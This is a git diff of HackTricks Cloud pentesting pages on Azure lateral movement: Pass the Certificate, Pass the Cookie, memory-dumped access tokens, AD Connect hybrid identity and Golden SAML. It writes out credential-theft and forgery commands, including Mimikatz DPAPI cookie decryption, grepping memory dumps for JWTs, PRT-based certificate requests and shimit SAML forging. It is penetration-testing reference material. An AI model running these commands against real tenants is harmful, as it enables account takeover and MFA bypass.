+- The machine (client) initiating the connection **needs a certificate from Azure AD for a user**.
+- Client creates a JSON Web Token (JWT) header containing PRT and other details, sign it using the Derived key (using the session key and the security context) and **sends it to Azure AD**
+- Azure AD verifies the JWT signature using client session key and security context, checks validity of PRT and **responds** with the **certificate**.
+
+In this scenario and after grabbing all the info needed for a [**Pass the PRT**](pass-the-prt.md) attack:
+
+- Username
+- Tenant ID
+- PRT
+- Security context
+- Derived Key
+
+It's possible to **request P2P certificate** for the user with the tool [**PrtToCert**](https://github.com/morRubin/PrtToCert)**:**
+
+```bash
+RequestCert.py [-h] --tenantId TENANTID --prt PRT --userName USERNAME --hexCtx HEXCTX --hexDerivedKey HEXDERIVEDKEY [--passPhrase PASSPHRASE]
+```
+
+The certificates will last the same as the PRT. To use the certificate you can use the python tool [**AzureADJoinedMachinePTC**](https://github.com/morRubin/AzureADJoinedMachinePTC) that will **authenticate** to the remote machine, run **PSEXEC** and **open a CMD** on the victim machine. This will allow us to use Mimikatz again to get the PRT of another user.
+
+```bash
+Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
+```
+
+## References
+
+- For more details about how Pass the Certificate works check the original post [https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597](https://medium.com/@mor2464/azure-ad-pass-the-certificate-d0c5de624597)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
new file mode 100644
index 000000000..bf7c5d0d9
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md
@@ -0,0 +1,37 @@
+# Az - Pass the Cookie
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Why Cookies?
+
+Browser **cookies** are a great mechanism to **bypass authentication and MFA**. Because the user has already authenticated in the application, the session **cookie** can just be used to **access data** as that user, without needing to re-authenticate.
+
+You can see where are **browser cookies located** in:
+
+{{#ref}}
+https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts?q=browse#google-chrome
+{{#endref}}
+
+## Attack
+
+The challenging part is that those **cookies are encrypted** for the **user** via the Microsoft Data Protection API (**DPAPI**). This is encrypted using cryptographic [keys tied to the user](https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords) the cookies belong to. You can find more information about this in:
+
+{{#ref}}
+https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords
+{{#endref}}
+
+With Mimikatz in hand, I am able to **extract a user’s cookies** even though they are encrypted with this command:
+
+```bash
+mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
+```
+
+For Azure, we care about the authentication cookies including **`ESTSAUTH`**, **`ESTSAUTHPERSISTENT`**, and **`ESTSAUTHLIGHT`**. Those are there because the user has been active on Azure lately.
+
+Just navigate to login.microsoftonline.com and add the cookie **`ESTSAUTHPERSISTENT`** (generated by “Stay Signed In” option) or **`ESTSAUTH`**. And you will be authenticated.
+
+## References
+
+- [https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/](https://stealthbits.com/blog/bypassing-mfa-with-pass-the-cookie/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
new file mode 100644
index 000000000..8b4cc9e15
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.md
@@ -0,0 +1,7 @@
+# Az - Phishing Primary Refresh Token (Microsoft Entra)
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+**Check:** [**https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/**](https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
new file mode 100644
index 000000000..85a1469d3
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
@@ -0,0 +1,7 @@
+# Az - Primary Refresh Token (PRT)
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+**Chec the post in** [**https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/**](https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/) although another post explaining the same can be found in [**https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30**](https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
new file mode 100644
index 000000000..0fb52cfb7
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md
@@ -0,0 +1,37 @@
+# Az - Processes Memory Access Token
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## **Basic Information**
+
+As explained in [**this video**](https://www.youtube.com/watch?v=OHKZkXC4Duw), some Microsoft software synchronized with the cloud (Excel, Teams...) might **store access tokens in clear-text in memory**. So just **dumping** the **memory** of the process and **grepping for JWT tokens** might grant you access over several resources of the victim in the cloud bypassing MFA.
+
+Steps:
+
+1. Dump the excel processes synchronized with in EntraID user with your favourite tool.
+2. Run: `string excel.dmp | grep 'eyJ0'` and find several tokens in the output
+3. Find the tokens that interest you the most and run tools over them:
+
+```bash
+# Check the identity of the token
+curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/me | jq
+
+# Check the email (you need a token authorized in login.microsoftonline.com)
+curl -s -H "Authorization: Bearer " https://outlook.office.com/api/v2.0/me/messages | jq
+
+# Download a file from Teams
+## You need a token that can access graph.microsoft.com
+## Then, find the inside the memory and call
+curl -s -H "Authorization: Bearer " https://graph.microsoft.com/v1.0/sites//drives | jq
+
+## Then, list one drive
+curl -s -H "Authorization: Bearer " 'https://graph.microsoft.com/v1.0/sites//drives/' | jq
+
+## Finally, download a file from that drive:
+┌──(magichk㉿black-pearl)-[~]
+└─$ curl -o -L -H "Authorization: Bearer " '<@microsoft.graph.downloadUrl>'
+```
+
+**Note that these kind of access tokens can be also found inside other processes.**
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md
new file mode 100644
index 000000000..e241d2c05
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/README.md
@@ -0,0 +1,60 @@
+# Az AD Connect - Hybrid Identity
+
+{{#include ../../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Integration between **On-premises Active Directory (AD)** and **Azure AD** is facilitated by **Azure AD Connect**, offering various methods that support **Single Sign-on (SSO)**. Each method, while useful, presents potential security vulnerabilities that could be exploited to compromise cloud or on-premises environments:
+
+- **Pass-Through Authentication (PTA)**:
+ - Possible compromise of the agent on the on-prem AD, allowing validation of user passwords for Azure connections (on-prem to Cloud).
+ - Feasibility of registering a new agent to validate authentications in a new location (Cloud to on-prem).
+
+{{#ref}}
+pta-pass-through-authentication.md
+{{#endref}}
+
+- **Password Hash Sync (PHS)**:
+ - Potential extraction of clear-text passwords of privileged users from the AD, including credentials of a high-privileged, auto-generated AzureAD user.
+
+{{#ref}}
+phs-password-hash-sync.md
+{{#endref}}
+
+- **Federation**:
+ - Theft of the private key used for SAML signing, enabling impersonation of on-prem and cloud identities.
+
+{{#ref}}
+federation.md
+{{#endref}}
+
+- **Seamless SSO:**
+ - Theft of the `AZUREADSSOACC` user's password, used for signing Kerberos silver tickets, allowing impersonation of any cloud user.
+
+{{#ref}}
+seamless-sso.md
+{{#endref}}
+
+- **Cloud Kerberos Trust**:
+ - Possibility of escalating from Global Admin to on-prem Domain Admin by manipulating AzureAD user usernames and SIDs and requesting TGTs from AzureAD.
+
+{{#ref}}
+az-cloud-kerberos-trust.md
+{{#endref}}
+
+- **Default Applications**:
+ - Compromising an Application Administrator account or the on-premise Sync Account allows modification of directory settings, group memberships, user accounts, SharePoint sites, and OneDrive files.
+
+{{#ref}}
+az-default-applications.md
+{{#endref}}
+
+For each integration method, user synchronization is conducted, and an `MSOL_` account is created in the on-prem AD. Notably, both **PHS** and **PTA** methods facilitate **Seamless SSO**, enabling automatic sign-in for Azure AD computers joined to the on-prem domain.
+
+To verify the installation of **Azure AD Connect**, the following PowerShell command, utilizing the **AzureADConnectHealthSync** module (installed by default with Azure AD Connect), can be used:
+
+```powershell
+Get-ADSyncConnector
+```
+
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
similarity index 59%
rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
index 6c0e772f8..9263f6668 100644
--- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
+++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.md
@@ -1,21 +1,8 @@
 # Az - Cloud Kerberos Trust
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+{{#include ../../../../banners/hacktricks-training.md}}
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-**This post is a summary of** [**https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/**](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) **which can be checked for further information about the attack. This technique is also commented in** [**https://www.youtube.com/watch?v=AFay\_58QubY**](https://www.youtube.com/watch?v=AFay_58QubY)**.**
+**This post is a summary of** [**https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/**](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) **which can be checked for further information about the attack. This technique is also commented in** [**https://www.youtube.com/watch?v=AFay_58QubY**](https://www.youtube.com/watch?v=AFay_58QubY)**.**
 ## Basic Information
@@ -25,9 +12,8 @@ When a trust is stablished with Azure AD, a **Read Only Domain Controller (RODC)
 Therefore, if this account is compromised it could be possible to impersonate any user... although this is not true because this account is prevented from creating tickets for any common privileged AD group like Domain Admins, Enterprise Admins, Administrators...
-{% hint style="danger" %}
-However, in a real scenario there are going to be privileged users that aren't in those groups. So the **new krbtgt account, if compromised, could be used to impersonate them.**
-{% endhint %}
+> [!CAUTION]
+> However, in a real scenario there are going to be privileged users that aren't in those groups. So the **new krbtgt account, if compromised, could be used to impersonate them.**
 ### Kerberos TGT
@@ -50,27 +36,14 @@ Note that we can do this with AADInternals and update to synced users via the [S The success of the attack and attainment of Domain Admin privileges hinge on meeting certain prerequisites: -* The capability to alter accounts via the Synchronization API is crucial. This can be achieved by having the role of Global Admin or possessing an AD Connect sync account. Alternatively, the Hybrid Identity Administrator role would suffice, as it grants the ability to manage AD Connect and establish new sync accounts. -* Presence of a **hybrid account** is essential. This account must be amenable to modification with the victim account's details and should also be accessible for authentication. -* Identification of a **target victim account** within Active Directory is a necessity. Although the attack can be executed on any account already synchronized, the Azure AD tenant must not have replicated on-premises security identifiers, necessitating the modification of an unsynchronized account to procure the ticket. - * Additionally, this account should possess domain admin equivalent privileges but must not be a member of typical AD administrator groups to avoid the generation of invalid TGTs by the AzureAD RODC. - * The most suitable target is the **Active Directory account utilized by the AD Connect Sync service**. This account is not synchronized with Azure AD, leaving its SID as a viable target, and it inherently holds Domain Admin equivalent privileges due to its role in synchronizing password hashes (assuming Password Hash Sync is active). For domains with express installation, this account is prefixed with **MSOL\_**. For other instances, the account can be pinpointed by enumerating all accounts endowed with Directory Replication privileges on the domain object. +- The capability to alter accounts via the Synchronization API is crucial. This can be achieved by having the role of Global Admin or possessing an AD Connect sync account. 
Alternatively, the Hybrid Identity Administrator role would suffice, as it grants the ability to manage AD Connect and establish new sync accounts. +- Presence of a **hybrid account** is essential. This account must be amenable to modification with the victim account's details and should also be accessible for authentication. +- Identification of a **target victim account** within Active Directory is a necessity. Although the attack can be executed on any account already synchronized, the Azure AD tenant must not have replicated on-premises security identifiers, necessitating the modification of an unsynchronized account to procure the ticket. + - Additionally, this account should possess domain admin equivalent privileges but must not be a member of typical AD administrator groups to avoid the generation of invalid TGTs by the AzureAD RODC. + - The most suitable target is the **Active Directory account utilized by the AD Connect Sync service**. This account is not synchronized with Azure AD, leaving its SID as a viable target, and it inherently holds Domain Admin equivalent privileges due to its role in synchronizing password hashes (assuming Password Hash Sync is active). For domains with express installation, this account is prefixed with **MSOL\_**. For other instances, the account can be pinpointed by enumerating all accounts endowed with Directory Replication privileges on the domain object. ### The full attack Check it in the original post: [https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/](https://dirkjanm.io/obtaining-domain-admin-from-azure-ad-via-cloud-kerberos-trust/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md new file mode 100644 index 000000000..92176611d --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.md @@ -0,0 +1,9 @@ +# Az - Default Applications + +{{#include ../../../../banners/hacktricks-training.md}} + +**Check the techinque in:** [**https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/**](https://dirkjanm.io/azure-ad-privilege-escalation-application-admin/)**,** [**https://www.youtube.com/watch?v=JEIR5oGCwdg**](https://www.youtube.com/watch?v=JEIR5oGCwdg) and [**https://www.youtube.com/watch?v=xei8lAPitX8**](https://www.youtube.com/watch?v=xei8lAPitX8) + +The blog post discusses a privilege escalation vulnerability in Azure AD, allowing Application Admins or compromised On-Premise Sync Accounts to escalate privileges by assigning credentials to applications. The vulnerability, stemming from the "by-design" behavior of Azure AD's handling of applications and service principals, notably affects default Office 365 applications. Although reported, the issue is not considered a vulnerability by Microsoft due to documentation of the admin rights assignment behavior. The post provides detailed technical insights and advises regular reviews of service principal credentials in Azure AD environments. For more detailed information, you can visit the original blog post. + +{{#include ../../../../banners/hacktricks-training.md}} 
diff --git a/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md new file mode 100644 index 000000000..512fb6dad --- /dev/null +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.md @@ -0,0 +1,32 @@ +# Az- Synchronising New Users + +{{#include ../../../../banners/hacktricks-training.md}} + +## Syncing AzureAD users to on-prem to escalate from on-prem to AzureAD + +I order to synchronize a new user f**rom AzureAD to the on-prem AD** these are the requirements: + +- The **AzureAD user** needs to have a proxy address (a **mailbox**) +- License is not required +- Should **not be already synced** + +```powershell +Get-MsolUser -SerachString admintest | select displayname, lastdirsynctime, proxyaddresses, lastpasswordchangetimestamp | fl +``` + +When a user like these is found in AzureAD, in order to **access it from the on-prem AD** you just need to **create a new account** with the **proxyAddress** the SMTP email. + +An automatically, this user will be **synced from AzureAD to the on-prem AD user**. + +> [!CAUTION] +> Notice that to perform this attack you **don't need Domain Admin**, you just need permissions to **create new users**. +> +> Also, this **won't bypass MFA**. +> +> Moreover, this was reported an **account sync is no longer possible for admin accounts**. + +## References + +- [https://www.youtube.com/watch?v=JEIR5oGCwdg](https://www.youtube.com/watch?v=JEIR5oGCwdg) + +{{#include ../../../../banners/hacktricks-training.md}} 
diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md similarity index 66% rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md index caf83bbd1..8ab63e3a1 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.md @@ -1,19 +1,6 @@ # Az - Federation -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information @@ -21,7 +8,7 @@ Learn & practice GCP Hacking:
+
Bsiacally, in Federation, all **authentication** occurs in the **on-prem** environment and the user experiences SSO across all the trusted environments. Therefore, users can **access** **cloud** applications by using their **on-prem credentials**. @@ -29,13 +16,13 @@ Bsiacally, in Federation, all **authentication** occurs in the **on-prem** envir In any federation setup there are three parties: -* User or Client -* Identity Provider (IdP) -* Service Provider (SP) +- User or Client +- Identity Provider (IdP) +- Service Provider (SP) (Images from https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) -
+
1. Initially, an application (Service Provider or SP, such as AWS console or vSphere web client) is accessed by a user. This step might be bypassed, leading the client directly to the IdP (Identity Provider) depending on the specific implementation. 2. Subsequently, the SP identifies the appropriate IdP (e.g., AD FS, Okta) for user authentication. It then crafts a SAML (Security Assertion Markup Language) AuthnRequest and reroutes the client to the chosen IdP. 
@@ -44,24 +31,26 @@ In any federation setup there are three parties: **If you want to learn more about SAML authentication and common attacks go to:** -{% embed url="https://book.hacktricks.xyz/pentesting-web/saml-attacks" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/saml-attacks +{{#endref}} ## Pivoting -* AD FS is a claims-based identity model. -* "..claimsaresimplystatements(forexample,name,identity,group), made about users, that are used primarily for authorizing access to claims-based applications located anywhere on the Internet." -* Claims for a user are written inside the SAML tokens and are then signed to provide confidentiality by the IdP. -* A user is identified by ImmutableID. It is globally unique and stored in Azure AD. -* TheImmuatbleIDisstoredon-premasms-DS-ConsistencyGuidforthe user and/or can be derived from the GUID of the user. -* More info in [https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims) +- AD FS is a claims-based identity model. +- "..claimsaresimplystatements(forexample,name,identity,group), made about users, that are used primarily for authorizing access to claims-based applications located anywhere on the Internet." +- Claims for a user are written inside the SAML tokens and are then signed to provide confidentiality by the IdP. +- A user is identified by ImmutableID. It is globally unique and stored in Azure AD. +- TheImmuatbleIDisstoredon-premasms-DS-ConsistencyGuidforthe user and/or can be derived from the GUID of the user. +- More info in [https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims](https://learn.microsoft.com/en-us/windows-server/identity/ad-fs/technical-reference/the-role-of-claims) **Golden SAML attack:** -* In ADFS, SAML Response is signed by a token-signing certificate. 
-* If the certificate is compromised, it is possible to authenticate to the Azure AD as ANY user synced to Azure AD! -* Just like our PTA abuse, password change for a user or MFA won't have any effect because we are forging the authentication response. -* The certificate can be extracted from the AD FS server with DA privileges and then can be used from any internet connected machine. -* More info in [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) +- In ADFS, SAML Response is signed by a token-signing certificate. +- If the certificate is compromised, it is possible to authenticate to the Azure AD as ANY user synced to Azure AD! +- Just like our PTA abuse, password change for a user or MFA won't have any effect because we are forging the authentication response. +- The certificate can be extracted from the AD FS server with DA privileges and then can be used from any internet connected machine. +- More info in [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) ### Golden SAML 
@@ -71,26 +60,26 @@ A parallel can be drawn with the [golden ticket attack](https://book.hacktricks. Golden SAMLs offer certain advantages: -* They can be **created remotely**, without the need to be part of the domain or federation in question. -* They remain effective even with **Two-Factor Authentication (2FA)** enabled. -* The token-signing **private key does not automatically renew**. -* **Changing a user’s password does not invalidate** an already generated SAML. +- They can be **created remotely**, without the need to be part of the domain or federation in question. +- They remain effective even with **Two-Factor Authentication (2FA)** enabled. +- The token-signing **private key does not automatically renew**. +- **Changing a user’s password does not invalidate** an already generated SAML. #### AWS + AD FS + Golden SAML -[Active Directory Federation Services (AD FS)](https://docs.microsoft.com/en-us/previous-versions/windows/server-2008/bb897402\(v=msdn.10\)) is a Microsoft service that facilitates the **secure exchange of identity information** between trusted business partners (federation). It essentially allows a domain service to share user identities with other service providers within a federation. +[Active Directory Federation Services (AD FS)]() is a Microsoft service that facilitates the **secure exchange of identity information** between trusted business partners (federation). It essentially allows a domain service to share user identities with other service providers within a federation. With AWS trusting the compromised domain (in a federation), this vulnerability can be exploited to potentially **acquire any permissions in the AWS environment**. The attack necessitates the **private key used to sign the SAML objects**, akin to needing the KRBTGT in a golden ticket attack. Access to the AD FS user account is sufficient to obtain this private key. 
The requirements for executing a golden SAML attack include: -* **Token-signing private key** -* **IdP public certificate** -* **IdP name** -* **Role name (role to assume)** -* Domain\username -* Role session name in AWS -* Amazon account ID +- **Token-signing private key** +- **IdP public certificate** +- **IdP name** +- **Role name (role to assume)** +- Domain\username +- Role session name in AWS +- Amazon account ID _Only the items in bold are mandatory. The others can be filled in as desired._ @@ -112,7 +101,6 @@ To acquire the **private key**, access to the **AD FS user account** is necessar With all the information, it's possible to forget a valid SAMLResponse as the user you want to impersonate using [**shimit**](https://github.com/cyberark/shimit)**:** -{% code overflow="wrap" %} ```bash # Apply session for AWS cli python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 @@ -127,9 +115,8 @@ python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file - # Save SAMLResponse to file python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012 -o saml_response.xml ``` -{% endcode %} -
+
### On-prem -> cloud @@ -155,7 +142,7 @@ Open-AADIntOffice365Portal -ImmutableID v1pOC7Pz8kaT6JWtThJKRQ== -Issuer http:// It's also possible to create ImmutableID of cloud only users and impersonate them ```powershell -# Create a realistic ImmutableID and set it for a cloud only user +# Create a realistic ImmutableID and set it for a cloud only user [System.Convert]::ToBase64String((New-Guid).tobytearray()) Set-AADIntAzureADObject -CloudAnchor "User_19e466c5-d938-1293-5967-c39488bca87e" -SourceAnchor "aodilmsic30fugCUgHxsnK==" @@ -168,20 +155,7 @@ Open-AADIntOffice365Portal -ImmutableID "aodilmsic30fugCUgHxsnK==" -Issuer http: ## References -* [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed) -* [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) +- [https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed](https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed) +- [https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps](https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md similarity index 60% rename from pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md rename to src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md index a509782eb..7c61e9337 100644 --- a/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md +++ b/src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.md @@ -1,25 +1,12 @@ # Az - PHS - Password Hash Sync -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
